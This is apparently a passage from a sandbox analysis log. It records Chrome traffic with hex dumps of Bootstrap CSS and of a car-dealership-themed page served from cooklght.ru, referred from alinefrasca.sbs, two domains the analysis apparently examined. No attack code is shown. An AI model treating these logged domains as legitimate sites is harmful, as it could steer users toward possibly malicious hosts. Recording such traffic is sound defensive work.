                                                                            Data Ascii: m:rotate(-12deg)}36%{-webkit-transform:rotate(12deg);transform:rotate(12deg)}40%,to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}@keyframes fa-shake{0%{-webkit-transform:rotate(-15deg);transform:rotate(-15deg)}4%{-webkit-transform:rotate(15deg);


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            28192.168.2.449779151.101.193.2294431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:36:43 UTC575OUTGET /npm/bootstrap@5.3.0/dist/css/bootstrap.min.css HTTP/1.1
                                                                            Host: cdn.jsdelivr.net
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: text/css,*/*;q=0.1
                                                                            Sec-Fetch-Site: cross-site
                                                                            Sec-Fetch-Mode: no-cors
                                                                            Sec-Fetch-Dest: style
                                                                            Referer: https://alinefrasca.sbs/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:36:43 UTC762INHTTP/1.1 200 OK
                                                                            Connection: close
                                                                            Content-Length: 232914
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Expose-Headers: *
                                                                            Timing-Allow-Origin: *
                                                                            Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable
                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                            X-Content-Type-Options: nosniff
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Content-Type: text/css; charset=utf-8
                                                                            X-JSD-Version: 5.3.0
                                                                            X-JSD-Version-Type: version
                                                                            ETag: W/"38dd2-sjFlHg/Wi72HWBifvTZCxGLTT6Y"
                                                                            Accept-Ranges: bytes
                                                                            Date: Mon, 28 Oct 2024 08:36:43 GMT
                                                                            Age: 512912
                                                                            X-Served-By: cache-fra-eddf8230088-FRA, cache-dfw-kdal2120050-DFW
                                                                            X-Cache: HIT, HIT
                                                                            Vary: Accept-Encoding
                                                                            alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                            2024-10-28 08:36:43 UTC16384INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 20 76 35 2e 33 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 33 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 3a 72 6f 6f 74 2c 5b 64 61 74 61 2d 62 73 2d 74 68 65 6d 65 3d 6c 69 67 68 74 5d 7b 2d 2d 62 73 2d 62 6c 75 65 3a 23 30 64 36 65 66 64 3b 2d 2d 62 73 2d 69 6e 64 69 67 6f 3a 23 36 36
                                                                            Data Ascii: @charset "UTF-8";/*! * Bootstrap v5.3.0 (https://getbootstrap.com/) * Copyright 2011-2023 The Bootstrap Authors * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */:root,[data-bs-theme=light]{--bs-blue:#0d6efd;--bs-indigo:#66
                                                                            2024-10-28 08:36:44 UTC16384INData Raw: 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 6d 64 2d 33 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 33 33 2e 33 33 33 33 33 33 33 33 33 33 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 6d 64 2d 34 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 32 35 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 6d 64 2d 35 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 32 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 6d 64 2d 36 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 36 2e 36 36 36 36 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 6d 64 2d 61 75 74 6f 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 61 75 74 6f 7d 2e 63 6f 6c 2d 6d 64 2d 31 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a
                                                                            Data Ascii: }.row-cols-md-3>*{flex:0 0 auto;width:33.3333333333%}.row-cols-md-4>*{flex:0 0 auto;width:25%}.row-cols-md-5>*{flex:0 0 auto;width:20%}.row-cols-md-6>*{flex:0 0 auto;width:16.6666666667%}.col-md-auto{flex:0 0 auto;width:auto}.col-md-1{flex:0 0 auto;width:
                                                                            2024-10-28 08:36:44 UTC16384INData Raw: 64 3a 31 72 65 6d 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 31 72 65 6d 7d 74 65 78 74 61 72 65 61 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 2e 35 65 6d 20 2b 20 2e 37 35 72 65 6d 20 2b 20 63 61 6c 63 28 76 61 72 28 2d 2d 62 73 2d 62 6f 72 64 65 72 2d 77 69 64 74 68 29 20 2a 20 32 29 29 7d 74 65 78 74 61 72 65 61 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 73 6d 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 2e 35 65 6d 20 2b 20 2e 35 72 65 6d 20 2b 20 63 61 6c 63 28 76 61 72 28 2d 2d 62 73 2d 62 6f 72 64 65 72 2d 77 69 64 74 68 29 20 2a 20 32 29 29 7d 74 65 78 74 61 72 65 61 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 6c 67 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 2e 35 65
                                                                            Data Ascii: d:1rem;margin-inline-end:1rem}textarea.form-control{min-height:calc(1.5em + .75rem + calc(var(--bs-border-width) * 2))}textarea.form-control-sm{min-height:calc(1.5em + .5rem + calc(var(--bs-border-width) * 2))}textarea.form-control-lg{min-height:calc(1.5e
                                                                            2024-10-28 08:36:44 UTC16384INData Raw: 6c 69 64 61 74 65 64 20 2e 66 6f 72 6d 2d 63 68 65 63 6b 2d 69 6e 70 75 74 3a 76 61 6c 69 64 3a 66 6f 63 75 73 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 2e 32 35 72 65 6d 20 72 67 62 61 28 76 61 72 28 2d 2d 62 73 2d 73 75 63 63 65 73 73 2d 72 67 62 29 2c 2e 32 35 29 7d 2e 66 6f 72 6d 2d 63 68 65 63 6b 2d 69 6e 70 75 74 2e 69 73 2d 76 61 6c 69 64 7e 2e 66 6f 72 6d 2d 63 68 65 63 6b 2d 6c 61 62 65 6c 2c 2e 77 61 73 2d 76 61 6c 69 64 61 74 65 64 20 2e 66 6f 72 6d 2d 63 68 65 63 6b 2d 69 6e 70 75 74 3a 76 61 6c 69 64 7e 2e 66 6f 72 6d 2d 63 68 65 63 6b 2d 6c 61 62 65 6c 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 73 2d 66 6f 72 6d 2d 76 61 6c 69 64 2d 63 6f 6c 6f 72 29 7d 2e 66 6f 72 6d 2d 63 68 65 63 6b 2d 69 6e 6c 69 6e 65 20 2e 66 6f 72 6d 2d 63
                                                                            Data Ascii: lidated .form-check-input:valid:focus{box-shadow:0 0 0 .25rem rgba(var(--bs-success-rgb),.25)}.form-check-input.is-valid~.form-check-label,.was-validated .form-check-input:valid~.form-check-label{color:var(--bs-form-valid-color)}.form-check-inline .form-c
                                                                            2024-10-28 08:36:44 UTC16384INData Raw: 62 73 2d 62 6f 72 64 65 72 2d 77 69 64 74 68 29 29 3b 2d 2d 62 73 2d 64 72 6f 70 64 6f 77 6e 2d 64 69 76 69 64 65 72 2d 62 67 3a 76 61 72 28 2d 2d 62 73 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 2d 74 72 61 6e 73 6c 75 63 65 6e 74 29 3b 2d 2d 62 73 2d 64 72 6f 70 64 6f 77 6e 2d 64 69 76 69 64 65 72 2d 6d 61 72 67 69 6e 2d 79 3a 30 2e 35 72 65 6d 3b 2d 2d 62 73 2d 64 72 6f 70 64 6f 77 6e 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 2e 35 72 65 6d 20 31 72 65 6d 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 35 29 3b 2d 2d 62 73 2d 64 72 6f 70 64 6f 77 6e 2d 6c 69 6e 6b 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 73 2d 62 6f 64 79 2d 63 6f 6c 6f 72 29 3b 2d 2d 62 73 2d 64 72 6f 70 64 6f 77 6e 2d 6c 69 6e 6b 2d 68 6f 76 65 72 2d 63 6f 6c 6f 72 3a 76 61 72
                                                                            Data Ascii: bs-border-width));--bs-dropdown-divider-bg:var(--bs-border-color-translucent);--bs-dropdown-divider-margin-y:0.5rem;--bs-dropdown-box-shadow:0 0.5rem 1rem rgba(0, 0, 0, 0.15);--bs-dropdown-link-color:var(--bs-body-color);--bs-dropdown-link-hover-color:var
                                                                            2024-10-28 08:36:44 UTC16384INData Raw: 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 2d 6d 64 20 2e 6e 61 76 62 61 72 2d 6e 61 76 20 2e 6e 61 76 2d 6c 69 6e 6b 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 76 61 72 28 2d 2d 62 73 2d 6e 61 76 62 61 72 2d 6e 61 76 2d 6c 69 6e 6b 2d 70 61 64 64 69 6e 67 2d 78 29 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 76 61 72 28 2d 2d 62 73 2d 6e 61 76 62 61 72 2d 6e 61 76 2d 6c 69 6e 6b 2d 70 61 64 64 69 6e 67 2d 78 29 7d 2e 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 2d 6d 64 20 2e 6e 61 76 62 61 72 2d 6e 61 76 2d 73 63 72 6f 6c 6c 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 2e 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 2d 6d 64 20 2e 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 21 69 6d 70
                                                                            Data Ascii: n:absolute}.navbar-expand-md .navbar-nav .nav-link{padding-right:var(--bs-navbar-nav-link-padding-x);padding-left:var(--bs-navbar-nav-link-padding-x)}.navbar-expand-md .navbar-nav-scroll{overflow:visible}.navbar-expand-md .navbar-collapse{display:flex!imp
                                                                            2024-10-28 08:36:44 UTC16384INData Raw: 65 72 74 69 61 72 79 2d 62 67 29 3b 2d 2d 62 73 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 68 6f 76 65 72 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 73 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 29 3b 2d 2d 62 73 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 66 6f 63 75 73 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 73 2d 6c 69 6e 6b 2d 68 6f 76 65 72 2d 63 6f 6c 6f 72 29 3b 2d 2d 62 73 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 66 6f 63 75 73 2d 62 67 3a 76 61 72 28 2d 2d 62 73 2d 73 65 63 6f 6e 64 61 72 79 2d 62 67 29 3b 2d 2d 62 73 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 66 6f 63 75 73 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 30 2e 32 35 72 65 6d 20 72 67 62 61 28 31 33 2c 20 31 31 30 2c 20 32 35 33 2c 20 30 2e 32 35 29 3b 2d 2d 62 73 2d 70 61 67 69 6e
                                                                            Data Ascii: ertiary-bg);--bs-pagination-hover-border-color:var(--bs-border-color);--bs-pagination-focus-color:var(--bs-link-hover-color);--bs-pagination-focus-bg:var(--bs-secondary-bg);--bs-pagination-focus-box-shadow:0 0 0 0.25rem rgba(13, 110, 253, 0.25);--bs-pagin
                                                                            2024-10-28 08:36:44 UTC16384INData Raw: 70 2d 61 63 74 69 6f 6e 2d 68 6f 76 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 73 2d 65 6d 70 68 61 73 69 73 2d 63 6f 6c 6f 72 29 3b 2d 2d 62 73 2d 6c 69 73 74 2d 67 72 6f 75 70 2d 61 63 74 69 6f 6e 2d 68 6f 76 65 72 2d 62 67 3a 76 61 72 28 2d 2d 62 73 2d 69 6e 66 6f 2d 62 6f 72 64 65 72 2d 73 75 62 74 6c 65 29 3b 2d 2d 62 73 2d 6c 69 73 74 2d 67 72 6f 75 70 2d 61 63 74 69 6f 6e 2d 61 63 74 69 76 65 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 73 2d 65 6d 70 68 61 73 69 73 2d 63 6f 6c 6f 72 29 3b 2d 2d 62 73 2d 6c 69 73 74 2d 67 72 6f 75 70 2d 61 63 74 69 6f 6e 2d 61 63 74 69 76 65 2d 62 67 3a 76 61 72 28 2d 2d 62 73 2d 69 6e 66 6f 2d 62 6f 72 64 65 72 2d 73 75 62 74 6c 65 29 3b 2d 2d 62 73 2d 6c 69 73 74 2d 67 72 6f 75 70 2d 61 63 74 69 76 65 2d 63 6f
                                                                            Data Ascii: p-action-hover-color:var(--bs-emphasis-color);--bs-list-group-action-hover-bg:var(--bs-info-border-subtle);--bs-list-group-action-active-color:var(--bs-emphasis-color);--bs-list-group-action-active-bg:var(--bs-info-border-subtle);--bs-list-group-active-co
                                                                            2024-10-28 08:36:44 UTC16384INData Raw: 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 73 2d 70 6f 70 6f 76 65 72 2d 62 67 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6c 69 70 3a 70 61 64 64 69 6e 67 2d 62 6f 78 3b 62 6f 72 64 65 72 3a 76 61 72 28 2d 2d 62 73 2d 70 6f 70 6f 76 65 72 2d 62 6f 72 64 65 72 2d 77 69 64 74 68 29 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 62 73 2d 70 6f 70 6f 76 65 72 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 76 61 72 28 2d 2d 62 73 2d 70 6f 70 6f 76 65 72 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 29 7d 2e 70 6f 70 6f 76 65 72 20 2e 70 6f 70 6f 76 65 72 2d 61 72 72 6f 77 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 76 61 72 28 2d 2d 62 73 2d 70 6f 70 6f 76 65 72 2d 61 72 72 6f 77 2d 77 69 64 74 68 29
                                                                            Data Ascii: round-color:var(--bs-popover-bg);background-clip:padding-box;border:var(--bs-popover-border-width) solid var(--bs-popover-border-color);border-radius:var(--bs-popover-border-radius)}.popover .popover-arrow{display:block;width:var(--bs-popover-arrow-width)
                                                                            2024-10-28 08:36:44 UTC16384INData Raw: 31 31 39 39 2e 39 38 70 78 29 7b 2e 6f 66 66 63 61 6e 76 61 73 2d 78 6c 2e 6f 66 66 63 61 6e 76 61 73 2d 73 74 61 72 74 7b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 77 69 64 74 68 3a 76 61 72 28 2d 2d 62 73 2d 6f 66 66 63 61 6e 76 61 73 2d 77 69 64 74 68 29 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 76 61 72 28 2d 2d 62 73 2d 6f 66 66 63 61 6e 76 61 73 2d 62 6f 72 64 65 72 2d 77 69 64 74 68 29 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 62 73 2d 6f 66 66 63 61 6e 76 61 73 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 2d 31 30 30 25 29 7d 2e 6f 66 66 63 61 6e 76 61 73 2d 78 6c 2e 6f 66 66 63 61 6e 76 61 73 2d 65 6e 64 7b 74 6f 70 3a 30 3b 72 69 67 68 74 3a 30 3b 77 69 64 74 68 3a 76 61 72 28 2d 2d 62 73
                                                                            Data Ascii: 1199.98px){.offcanvas-xl.offcanvas-start{top:0;left:0;width:var(--bs-offcanvas-width);border-right:var(--bs-offcanvas-border-width) solid var(--bs-offcanvas-border-color);transform:translateX(-100%)}.offcanvas-xl.offcanvas-end{top:0;right:0;width:var(--bs


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            29192.168.2.449785104.21.91.1454431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:36:44 UTC336OUTGET // HTTP/1.1
                                                                            Host: cooklght.ru
                                                                            Connection: keep-alive
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: none
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: empty
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:36:45 UTC839INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:36:45 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            x-powered-by: PHP/7.3.33
                                                                            access-control-allow-origin: *
                                                                            vary: Accept-Encoding
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kkvIOXByRjrNPYDHZBxnyI5NiFOgbGvySI76aVFCNn6wBec%2B9rVLkgChvi%2BvisrkmMyY4bI3n9lM3AfVAX9Hwl16obu3kCisgVtNjkVjWBVL6NNXngLEC4PgV1EI4g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d999993a9746c6b-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1733&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=914&delivery_rate=1634311&cwnd=247&unsent_bytes=0&cid=a1fabcf3bfea0792&ts=392&x=0"
                                                                            2024-10-28 08:36:45 UTC530INData Raw: 31 64 33 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 64 72 65 6e 61 6c 69 6e 65 20 52 75 73 68
                                                                            Data Ascii: 1d34<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noarchive, nosnippet, noindex, nofollow"> <title>Adrenaline Rush
                                                                            2024-10-28 08:36:45 UTC1369INData Raw: 61 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 20 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 2d 6c 67 20 6e 61 76 62 61 72 2d 64 61 72 6b 20 62 67 2d 64 61 72 6b 20 73 74 69 63 6b 79 2d 74 6f 70 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 62 72 61 6e 64 20 66 77 2d 62 6f 6c 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 6f 6b 6c 67 68 74 2e 72 75 2f 2f 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 63 61 72 22 3e 3c 2f 69 3e 20 41 64 72 65 6e 61 6c 69 6e 65 20 52 75 73 68 20 4d 6f 74 6f 72 73 70 6f 72 74 73 20 2d 20 41 75 74 6f 53 68 6f 77 72 6f 6f 6d 0d 0a 20 20 20 20
                                                                            Data Ascii: av class="navbar navbar-expand-lg navbar-dark bg-dark sticky-top"> <div class="container"> <a class="navbar-brand fw-bold" href="https://cooklght.ru//"> <i class="fas fa-car"></i> Adrenaline Rush Motorsports - AutoShowroom
                                                                            2024-10-28 08:36:45 UTC1369INData Raw: 73 77 48 61 46 47 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 63 6f 76 65 72 3b 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 70 79 2d 35 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 64 69 73 70 6c 61 79 2d 34 20 66 77 2d 62 6f 6c 64 22 3e 44 69 73 63 6f 76 65 72 20 59 6f 75 72 20 4e 65 78 74 20 43 61 72 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 54 68 65 20 72 6f 61 64 20 6d 61 79 20 62 65 20 6c 6f 6e 67 2c 20 62 75 74 20 74 68 65 20 6a 6f 75 72 6e 65 79 20 69 73 20 77 6f 72 74 68 20 69 74 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74
                                                                            Data Ascii: swHaFG') no-repeat center; background-size: cover;"> <div class="container py-5"> <h1 class="display-4 fw-bold">Discover Your Next Car</h1> <p class="lead">The road may be long, but the journey is worth it.</p> <a href="htt
                                                                            2024-10-28 08:36:45 UTC1369INData Raw: 63 65 6e 74 65 72 27 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 6f 6b 6c 67 68 74 2e 72 75 2f 2f 23 69 6e 76 65 6e 74 6f 72 79 27 20 63 6c 61 73 73 3d 27 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 20 62 74 6e 2d 73 6d 27 3e 3c 69 20 63 6c 61 73 73 3d 27 66 61 73 20 66 61 2d 69 6e 66 6f 2d 63 69 72 63 6c 65 27 3e 3c 2f 69 3e 20 56 69 65 77 20 44 65 74 61 69 6c 73 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20
                                                                            Data Ascii: center'> <a href='https://cooklght.ru//#inventory' class='btn btn-primary btn-sm'><i class='fas fa-info-circle'></i> View Details</a> </div> </div> </div>
                                                                            2024-10-28 08:36:45 UTC1369INData Raw: 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 68 32 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 20 64 69 73 70 6c 61 79 2d 36 20 66 77 2d 62 6f 6c 64 20 6d 62 2d 34 22 3e 4f 75 72 20 53 65 72 76 69 63 65 73 3c 2f 68 32 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 20 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 34 20 6d 62 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 74 6f 6f 6c 73 20 64 69 73 70 6c 61 79 2d 36 22 3e 3c 2f 69 3e 0d 0a
                                                                            Data Ascii: color: #333;"> <div class="container"> <h2 class="text-center display-6 fw-bold mb-4">Our Services</h2> <div class="row text-center"> <div class="col-md-4 mb-4"> <i class="fas fa-tools display-6"></i>
                                                                            2024-10-28 08:36:45 UTC1369INData Raw: 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 65 6d 61 69 6c 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 45 6d 61 69 6c 22 20 72 65 71 75 69 72 65 64 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 31 32 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 65 78 74 61 72 65 61 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 72 6f 77 73 3d 22 34 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 4d 65 73 73 61 67 65 22 20 72 65 71 75 69 72 65 64 3e 3c 2f 74 65 78 74 61 72 65 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20
                                                                            Data Ascii: <input type="email" class="form-control" placeholder="Email" required> </div> <div class="col-12"> <textarea class="form-control" rows="4" placeholder="Message" required></textarea> </div>
                                                                            2024-10-28 08:36:45 UTC109INData Raw: 63 3d 22 66 61 6c 73 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                            Data Ascii: c="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script></body></html>
                                                                            2024-10-28 08:36:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            30192.168.2.449787104.17.25.144431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:36:45 UTC652OUTGET /ajax/libs/font-awesome/6.5.0/webfonts/fa-solid-900.woff2 HTTP/1.1
                                                                            Host: cdnjs.cloudflare.com
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            Origin: https://alinefrasca.sbs
